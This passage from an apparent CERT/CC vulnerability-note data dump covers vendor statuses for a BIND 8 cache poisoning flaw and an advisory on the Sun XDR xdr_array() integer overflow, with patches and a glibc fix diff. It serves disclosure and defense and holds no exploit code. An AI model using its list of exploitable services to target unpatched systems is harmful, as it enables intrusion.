October 21, 2003 Updated: November 25, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHitachi HI-UX/WE2 is NOT Vulnerable to this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Juniper Networks\n\nNotified: October 21, 2003 Updated: December 03, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo Juniper Networks products contain this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ MandrakeSoft\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo MandrakeSoft products are affected by this as we ship BIND9 in all of our products.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Nominum\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNominum products are not affected by this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ Red Hat Inc.\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nRed Hat ships Bind 9 in all our supported distributions and therefore we are not affected by this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ SGI\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI acknowledges VU#734644 reported by CERT and has determined that both SGI IRIX for MIPS systems and SGI ProPack Linux for Altix (IA64) are not vulnerable as BIND 8 does not ship with SGI IRIX or ProPack.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ adns\n\nNotified: October 21, 2003 Updated: November 20, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nadns is not a nameserver and has no cache. It is not vulnerable to these kinds of problems.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ BSDI\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ BlueCat Networks\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Conectiva\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Debian\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ EMC Corporation\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Fujitsu\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ __ IBM eServer\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nIBM eServer Platform Response \n\n\nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to \n[https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&amp;pathID=3D](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=3D>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to <http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be referred to [_servsec@us.ibm.com_](<mailto:servsec@us.ibm.com>).\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Ingrian Networks\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Lucent Technologies\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Men&amp;Mice\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ MetaSolv Software Inc.\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ MontaVista Software\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ NEC Corporation\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Nokia\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Nortel Networks\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Novell\n\nNotified: November 17, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Openwall GNU/*/Linux\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Sequent\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Sony Corporation\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ The SCO Group (SCO Linux)\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Unisys\n\nNotified: October 21, 2003 Updated: October 21, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Wind River Systems Inc.\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\n### __ Wirex\n\nNotified: October 21, 2003 Updated: November 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23734644 Feedback>).\n\nView all 45 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.isc.org/products/BIND/bind8.html>\n * [http://marc.theaimsgroup.com/?l=bind-announce&amp;m=106988846219834&amp;w=2](<http://marc.theaimsgroup.com/?l=bind-announce&m=106988846219834&w=2>)\n * [http://marc.theaimsgroup.com/?l=bind-announce&amp;m=106988846919846&amp;w=2](<http://marc.theaimsgroup.com/?l=bind-announce&m=106988846919846&w=2>)\n * <http://secunia.com/advisories/10300/>\n\n### Acknowledgements\n\nThe CERT/CC thanks the Internet Software Consortium for bringing this vulnerability to our attention. \n\nThis document was written by Jeffrey P. Lanza. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0914](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0914>) \n---|--- \n**Severity Metric:****** | 1.50 \n**Date Public:** | 2003-11-26 \n**Date First Published:** | 2003-12-01 \n**Date Last Updated: ** | 2004-01-05 00:30 UTC \n**Document Revision: ** | 40 \n", "modified": "2004-01-05T00:30:00", "published": "2003-12-01T00:00:00", "id": "VU:734644", "href": "https://www.kb.cert.org/vuls/id/734644", "type": "cert", "title": "ISC BIND 8 vulnerable to cache poisoning via negative responses", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T20:44:53", "bulletinFamily": "info", "description": "### Overview \n\nThere is an integer overflow present in the [__xdr_array()__](<http://www.freebsd.org/cgi/man.cgi?query=xdr_array&apropos=0&sektion=3&manpath=FreeBSD+4.6-RELEASE&format=html>) function distributed as part of the Sun Microsystems [_XDR library_](<ftp://ftp.isi.edu/in-notes/rfc1832.txt>). This overflow has been shown to lead to remotely exploitable buffer overflows in multiple applications, leading to the execution of arbitrary code. Although the library was originally distributed by Sun Microsystems, multiple vendors have included the vulnerable code in their own implementations.\n\n### Description \n\nThe XDR (external data representation) libraries are used to provide platform-independent methods for sending data from one system process to another, typically over a network connection. Such routines are commonly used in remote procedure call ([_RPC_](<ftp://ftp.isi.edu/in-notes/rfc1831.txt>)) implementations to provide transparency to application programmers who need to use common interfaces to interact with many different types of systems. The _xdr_array()_ function in the XDR library provided by Sun Microsystems contains an [_integer overflow_](<http://www.kb.cert.org/vuls/id/192995>) that can lead to improperly sized dynamic memory allocation. Subsequent problems like buffer overflows may result, depending on how and where the vulnerable _xdr_array()_ function is used. \n\nThis issue is currently being tracked as [_VU#192995_](<http://www.kb.cert.org/vuls/id/192995>) by the CERT/CC and as [_CAN-2002-0391_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0391>) in the Common Vulnerabilities and Exposures (CVE) dictionary. \n \n--- \n \n### Impact \n\nBecause SunRPC-derived XDR libraries are used by a variety of vendors in a variety of applications, this defect may lead to a number of differing security problems. Exploiting this vulnerability will lead to denial of service, execution of arbitrary code, or the disclosure of sensitive information. \n \nSpecific impacts reported include the ability to execute arbitrary code with root privileges (by exploiting [_dmispd, rpc.cmsd, or kadmind, for example_](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F46122&zone_32=category%3Asecurity>)). In addition, intruders who exploit the XDR overflow in [_MIT KRB5_](<http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-001-xdr.txt>) kadmind may be able to gain control of a Key Distribution Center (KDC) and improperly authenticate to other services within a trusted Kerberos realm. \n \n--- \n \n### Solution \n\n**Apply a patch from your vendor** \n \nNote that XDR libraries can be used by multiple applications on most systems. It may be necessary to upgrade or apply multiple patches and then recompile statically linked applications. \n \nApplications that are statically linked must be recompiled using patched libraries. Applications that are dynamically linked do not need to be recompiled; however, running services need to be restarted in order to use the patched libraries. \n \nSystem administrators should consider the following process when addressing this issue: \n\n\n 1. Patch or obtain updated XDR/RPC libraries. \n 2. Restart any dynamically linked services that make use of the XDR/RPC libraries. \n 3. Recompile any statically linked applications using the patched or updated XDR/RPC libraries.\n \nNote this is an iterative process for each set of patches being applied. \n--- \n \n**Disable access to vulnerable services or applications** \n \nUntil patches are available and can be applied, you may wish to disable access to services or applications compiled with the vulnerable _xdr_array()_ function. Such applications include, but are not limited to, the following: \n\n\n * DMI Service Provider daemon (dmispd) \n * CDE Calendar Manager Service daemon (rpc.cmsd) \n * MIT Kerberos 5 Administration daemon (kadmind) \n \nAs a best practice, the CERT/CC recommends disabling all services that are not explicitly required. \n--- \n \n### Vendor Information\n\n192995\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Computer, Inc.\n\nNotified: July 29, 2002 Updated: September 20, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe vulnerability described in this note is fixed with Security Updates 2002-08-02 and 2002-08-23.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n` \n`Security Update 2002-08-23 is now available. This applies the fixes \nalready available in Security Update 2002-08-02 to the Mac OS X 10.2 \n(Jaguar) release. Security Update 2002-08-02 was designed for the Mac \nOS X 10.1.5 release. \n` \n`It contains fixes for recent vulnerabilities in: \n` \n` OpenSSL: Fixes security vulnerabilities CAN-2002-0656, \nCAN-2002-0657, CAN-2002-0655, and CAN-2002-0659. Details are \navailable via: ``<http://www.cert.org/advisories/CA-2002-23.html>`` \n` \n` mod_ssl: Fixes CAN-2002-0653, an off-by-one buffer overflow in the \nmod_ssl Apache module. Details are available via: \n``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0653>`` \n` \n` Sun RPC: Fixes CAN-2002-039, a buffer overflow in the Sun RPC XDR \ndecoder. \nDetails are available via: \n` \n`<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823>`` \n` \n`Affected systems: Mac OS X client and Mac OS X Server \n` \n`Note: Mac OS X client is configured by default to have these services \nturned off, and is only vulnerable if the user has enabled network \nservices which rely on the affected components. It is still recommended \nfor Mac OS X client users to apply this security update to their system. \n` \n`System requirements: Mac OS X 10.2 (Jaguar) \n` \n`Security Update 2002-08-23 may be obtained from: \n` \n` * Software Update pane in System Preferences \n` \n` * Apple's Software Downloads web site: \n``<http://www.info.apple.com/kbnum/n120142>`` \n` \n`To help verify the integrity of Security Update 2002-08-23 from the \nSoftware Downloads web site: \n` \n` The download file is titled: SecurityUpd2002-08-23.dmg \nIts SHA-1 digest is: fccb3adb478f90650f4484534a79a80bba5f94f3 \n` \n`Information will also be posted to the Apple Product Security web site: \n``<http://www.apple.com/support/security/security_updates.html>`` \n` \n`This message is signed with Apple's Product Security PGP key, and \ndetails are available at: \n``<http://www.apple.com/support/security/security_pgp.html>`` \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.3 \n` \n`iQEVAwUBPWad3SFlYNdE6F9oAQHuIQf9GdW2n/r7di2U8c4jQU+3JvRtU+HG7Lsl \njlKRVNGyaMvUAurxbYB/yHfHcYDtsj26bupzLUpLXbIt54uZxyXo6UTExzpwreaT \nr+UJm7+q9kG6lcAmrcz2WNzlnD6icXKKuyf/hR8NUo3yBP7MoR6QGjvFqodvTOHR \nJ2YXH8AEPAmWFf511AzbG1yYvlDhocZ+/gBFTlaB3nYt11Edz2yRE4qeumQYEIyf \ngLFxzp1BVFNDJck66WjPWgHqDuq9QWPBzHl1qhd09ctD84w+Hda972dqxRn08Jo7 \njTGs2zmUpyPxLxCHEd5uzRNuMquIoddW2Nsg8LeJNHqRDlklVSJTUA== \n=CJ2Y \n-----END PGP SIGNATURE----- \n_______________________________________________ \n` \n\\---- Original Message ---- \nFrom:Product Security \nDate:Fri 8/2/02 20:02 \nTo:security-announce@lists.apple.com \nSubject:Security Update 2002-08-02 for OpenSSL, Sun RPC, mod_ssl \n \n\\-----BEGIN PGP SIGNED MESSAGE----- \n \nSecurity Update 2002-08-02 is now available. It contains fixes for \nrecent \nvulnerabilities in: \n \nOpenSSL: Fixes security vulnerabilities CAN-2002-0656, \nCAN-2002-0657, \nCAN-2002-0655, and CAN-2002-0659. Details are available via: \n_<http://www.cert.org/advisories/CA-2002-23.html>_ \n \nmod_ssl: Fixes CAN-2002-0653, an off-by-one buffer overflow in the \nmod_ssl Apache module. Details are available via: \n_<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0653>_ \n \nSun RPC: Fixes CAN-2002-039, a buffer overflow in the Sun RPC XDR \ndecoder. \nDetails are available via: \n \n_<http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823>_ \n \nAffected systems: Mac OS X client and Mac OS X Server \n \nNote: Mac OS X client is configured by default to have these services \nturned \noff, and is only vulnerable if the user has enabled network services \nwhich rely \non the affected components. It is still recommended for Mac OS X \nclient users \nto apply this security update to their system. \n \nSystem requirements: Mac OS X 10.1.5 \n \nSecurity Update 2002-08-02 may be obtained from: \n \n* Software Update pane in System Preferences \n \n* Apple's Software Downloads web site: \n_<http://docs.info.apple.com/article.html?artnum=120139>_ \n \nSSL server: \n_<https://depot.info.apple.com/security/129403bc5e184e3b7367.html>_ \n \nTo help verify the integrity of Security Update 2002-08-02 from the \nSoftware Downloads web site: \n \nThe download file is titled: SecurityUpd2002-08-02.dmg \nIts SHA-1 digest is: 54f6eebe0398181db8f1129403bc5e184e3b7367 \n \nInformation will also be posted to the Apple Product Security web site: \n_<http://www.apple.com/support/security/security_updates.html>_ \n \nThis message is signed with Apple's Product Security PGP key, and \ndetails are available at: \n_<http://www.apple.com/support/security/security_pgp.html>_ \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.3 \n \niQEVAwUBPUsLOiFlYNdE6F9oAQGAigf+JV+lazuko1g4oZSNFTd2puXCtOGQ0M8c \n2cZ/BdaEBA8jLGrPkhWuvmMwpN9z6G9chnN8s9EXiavcBG5e/ejtTo3ZHoOGP7bg \n789zLQLK2JTB75nc0fNyx2CdfHlEIM00v8c2jXySLlnqF+kzwqVnjUL7i2O97Fk5 \ntWXLc2dWK2Nf2SUk0/yLgfjceZKEPCPXTpuKYuah/w9NwzL+LsbPcfXA/H1f4ngc \nvRPc2sn2HYu9IJw/BrMEsDlS8IWHf6ozXdZ9qaVCVRrZlsd9gSSmB2Jba4be/MRX \nFauTTepMF9+JfCkx+2wtpwWhBcXoJnjwIZXOXwbbRjqXHmzzgu8D/Q== \n=fdGO \n\\-----END PGP SIGNATURE----- \n_______________________________________________ \nsecurity-announce mailing list | security-announce@lists.apple.com \nHelp/Unsubscribe/Archives: _<http://www.lists.apple.com/mailman/listinfo/security>_- \nannounce \nDo not post admin requests to the list. They will be ignored. \n\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Debian Linux\n\nNotified: July 29, 2002 Updated: August 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe Debian GNU/Linux distribution was vulnerable with regard to the the XDR problem as stated above with the following vulnerability matrix: \n\n\n \n` OpenAFS Kerberos5 GNU lib` \n`Debian 2.2 (potato) not included not included vulnerable \nDebian 3.0 (woody) vulnerable (DSA 142-1) vulnerable (DSA 143-1) vulnerable \nDebian unstable (sid) vulnerable (DSA 142-1) vulnerable (DSA 143-1) vulnerable` \nHowever, the following advisories were raised recently which contain and announced fixes: \n \nDSA 142-1 OpenAFS (safe version are: 1.2.3final2-6 (woody) and 1.2.6-1 (sid)) \nDSA 143-1 Kerberos5 (safe version are: 1.2.4-5woody1 (woody) and 1.2.5-2 (sid)) \n \nThe advisory for the GNU libc is pending, it is currently being recompiled. The fixed versions will probably be: \n\n\n`Debian 2.2 (potato) glibc 2.1.3-23 or later` \n`Debian 3.0 (woody) glibc 2.2.5-11.1 or later` \n`Debian unstable (sid) glibc 2.2.5-12 or later`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ FreeBSD, Inc.\n\nNotified: July 29, 2002 Updated: August 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:34.rpc.asc>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nNote this is a REVISED advisory pointing to patches correct on 07/31/2002.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ GNU glibc\n\nNotified: July 31, 2002 Updated: August 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`Version 2.2.5 and earlier versions of the GNU C Library are \nvulnerable. For Version 2.2.5, we suggest the following patch. \nThis patch is also available from the GNU C Library CVS repository at: \n` \n`[http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/sunrpc/xdr_array.c.diff?r1=1.5&r2=1.5.2.1&cvsroot=glibc](<http://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/sunrpc/xdr_array.c.diff?r1=1.5&r2=1.5.2.1&cvsroot=glibc>) \n` \n \n`2002-08-02 Jakub Jelinek <jakub@redhat.com> \n` \n`* sunrpc/xdr_array.c (xdr_array): Check for overflow on \nmultiplication. Patch by Solar Designer <solar@openwall.com>. \n` \n`=================================================================== \nRCS file: /cvs/glibc/libc/sunrpc/xdr_array.c,v \nretrieving revision 1.5 \nretrieving revision 1.5.2.1 \ndiff -u -r1.5 -r1.5.2.1 \n- --- libc/sunrpc/xdr_array.c2001/08/17 04:48:311.5 \n+++ libc/sunrpc/xdr_array.c2002/08/02 01:35:391.5.2.1 \n@@ -45,6 +45,7 @@ \n#include <rpc/types.h> \n#include <rpc/xdr.h> \n#include <libintl.h> \n+#include <limits.h> \n` \n` #ifdef USE_IN_LIBIO \n# include <wchar.h> \n@@ -81,7 +82,11 @@ \nreturn FALSE; \n} \nc = *sizep; \n- - if ((c > maxsize) && (xdrs->x_op != XDR_FREE)) \n+ /* \n+ * XXX: Let the overflow possibly happen with XDR_FREE because mem_free() \n+ * doesn't actually use its second argument anyway. \n+ */ \n+ if ((c > maxsize || c > UINT_MAX / elsize) && (xdrs->x_op != XDR_FREE)) \n{ \nreturn FALSE; \n} \n` \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (SunOS) \nComment: Processed by Mailcrypt 3.5.6 and Gnu Privacy Guard <<http://www.gnupg.org/>> \n` \n`iD8DBQE9Tv0wddnqSFPI1IgRAmomAJ9cK6vT8zZMGdO/0Z4nOIZwUej2BwCfbRT3 \nmnvR4B781bGEg3y6PVaRdDw= \n=qn87 \n-----END 